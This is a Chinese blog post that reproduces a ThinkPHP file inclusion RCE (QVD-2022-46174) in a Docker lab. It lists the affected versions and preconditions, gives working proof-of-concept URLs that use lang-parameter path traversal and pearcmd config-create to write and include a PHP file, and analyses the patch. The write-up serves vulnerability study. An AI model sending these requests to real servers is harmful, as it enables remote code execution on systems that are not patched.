ThinkPHP多语言文件包含RCE(QVD-2022-46174)

最新推荐文章于 2024-04-14 00:09:52 发布
最新推荐文章于 2024-04-14 00:09:52 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: ThinkPHP漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/128638095
版权

漏洞范围

  • v6.0.0<=ThinkPHP<=v6.0.13
  • v5.0.0<=ThinkPHP<=5.0.12
  • v5.1.0<=ThinkPHP<=5.1.8

需开启多语言选项,以thinkPHP6版本为例

  • 在自定义中间件定义文件app/middleware.php中添加\think\middleware\LoadLangPack::class

php需安装pearcmd拓展,并且开启了register_argc_argv选项

Docker PHP裸文件本地包含综述

在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在/usr/local/lib/php

漏洞复现

环境

使用vulfocus/thinkphp:6.0.12镜像搭建docker环境

poc

#写文件
/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=phpinfo()?>+/tmp/hello.php
#文件包含
/public/index.php?lang=../../../../../../../../tmp/hello

image-20230103230644399

image-20230103230701371

还有一种是/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami并没有尝试成功,好像也是需要利用pearcmd写文件到extend目录还需要一个自定义拓展的样子总感觉怪怪的,参考:【漏洞报送】ThinkPHP开发框架存在命令执行漏洞
image-20230103224654030

原理

  • 多语言组件导致的文件包含+pear写文件

查看官方文档关于多语言的解释可见:会首先检查请求的URL或者Cookie中是否包含语言变量

image-20230103231130249

查看新版本补丁可见ThinkPHP5中新增合法性检查

image-20230104005807546

ThinkPHP6新版本补丁\think\middleware\LoadLangPack::detect`中增加了对url、Header、Cookie中设置语言的合法性检查

image-20230104001533774

下面代码分析以ThinkPHP6为例。

\think\middleware\LoadLangPack::handle方法会被自动加载(中间件的入口执行方法)

image-20230104004719040

在detect方法中设置语言之后进入\think\Lang::switchLangSet进行语言切换,路径直接拼接而成

image-20230104005155020

进入\think\Lang::load进行加载,如果文件存在则调用\think\Lang::parse解析

image-20230104005403494

image-20230104005520133

参考

https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099

https://www.kancloud.cn/manual/thinkphp6_0/1037637

thinkphp6_0/1037637](https://www.kancloud.cn/manual/thinkphp6_0/1037637)

https://www.kancloud.cn/manual/thinkphp6_0/1037493

Arnoldqqq
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp多用户在线客服系统源码-thinkPHP内核 附使用教程
06-01
伪静态选择为thinkphp 宝塔 安全 放通: 2080 , 9090 这两个端口 步骤2 上方操作完毕后 创建个数据库 进行安装网站 安装 http://你的域名.com/install.php 步骤3 启动命令 制定目录 cd /www/wwwroot/你...
[漏洞复现]Thinkphp RCE
qq_45751902的博客
12-10 1994
Thinkphp 是一款 PHP 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含,从而利用 pearcmd 文件包含实现远程命令执行(RCE)。1、需要Thinkphp开启多语言功能2、需要有pearcmd扩展。
ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现
qq1140037586的博客
12-17 2605
ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。访问如下地址:http://xxx.xx.230.165:59502/public/index.php。使用vulfocus靶场复现漏洞,使用如下命令拉取镜像。
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,网络安全开发工程师面试题
最新发布
2401_83947105的博客
04-14 938
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
ThinkPHP 5.1框架结合RCE漏洞的深入分析
systemino的博客
04-21 4417
前言 在前几个月,Thinkphp连续爆发了多个严重漏洞。由于框架应用的广泛性,漏洞影响非常大。为了之后更好地防御和应对此框架漏洞,天融信阿尔法实验室对Thinkphp框架进行了详细地分析,并在此分享给大家共同学习。 本篇文章将从框架的流程讲起,让大家对Thinkphp有个大概的认识,接着讲述一些关于漏洞的相关知识,帮助大家在分析漏洞时能更好地理解漏洞原理,最后结合一个比较好的RCE漏洞(超链...
vulfocus复现:thinkphp lang 命令执行(thinkphp:6.0.12)
m0_71518346的博客
12-18 3415
在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件访问路径诶:/public/index.php
thinkphp lang命令执行(QVD-2022-46174)漏洞复现
weixin_54584489的博客
04-29 1034
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。当ThinkPHP开启多语言功能,并且存在扩展pear时,攻击者可以构造lang参数实现远程代码执行。本次漏洞复现,是建立在前人的基础上的,整个过程没有遇到太大问题,总体收获就是感受了一把该漏洞,以及复习了前面学习到的一句话木马,同时扩展了一些小知识点。将思绪代入最初的漏洞发现者,才明白知识储备对挖洞者的重要性。
Thinkphp QVD-2022-46174语言rce
qq_61768489的博客
01-18 1990
如果 Thinkphp 程序开启了多语言功能,那就可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCEPHP环境开启了PHP环境安装了pcel/pearDocker默认的PHP环境恰好满足上述条件。所以先使用vulhub进行漏洞利用的复现。
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP语言支持与多模板支持概述
12-18
本文以实例形式简述了ThinkPHP的多语言支持与多模板支持。是ThinkPHP中非常重要的技巧,分享给大家供大家参考。具体如下: 一、ThinkPHP语言支持: config.php配置文件中添加: //多语言支持设置 &#39;LANG_SWITCH_ON&#39;...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
thinkphp5.1.39、tp5.1.39版本
06-01
此版本为tp5.1.39thinkphp5.1.39
Thinkphp搭建包括JS多语言的多语言项目实现方法
10-25
主要介绍了Thinkphp搭建包括JS多语言的多语言项目实现方法,可实现通过针对js语言包的调用达到构建多语言站点的效果,是非常实用的技巧,需要的朋友可以参考下
ThinkPHP语言模块RCE漏洞复现
0xSec
12-25 3571
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 7225
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1124
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行。
ThinkPHP语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2088
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Thinkphp5~6多语言文件包含rce漏洞复现and详细分析解析
君逍遥o
09-08 832
Thinkphp5~6多语言文件包含rce漏洞复现and详细分析解析
【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 380
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行解析漏洞,攻击者可以利用该漏洞在服务器上执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。 通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用上执行任意命令,例如查看、修改或删除敏感文件,创建新用户账户,获取数据库信息等。这可能导致严重的安全风险和数据泄露。 为了防止此漏洞的利用,建议使用 ThinkPHP 的最新版本,并及时更新框架。此外,应开启严格的访问控制,限制对敏感函数和文件的访问。同时,将任何用户输入数据进行严格过滤和验证,以防止注入攻击。最重要的是,及时关注和安装安全补丁,保持应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值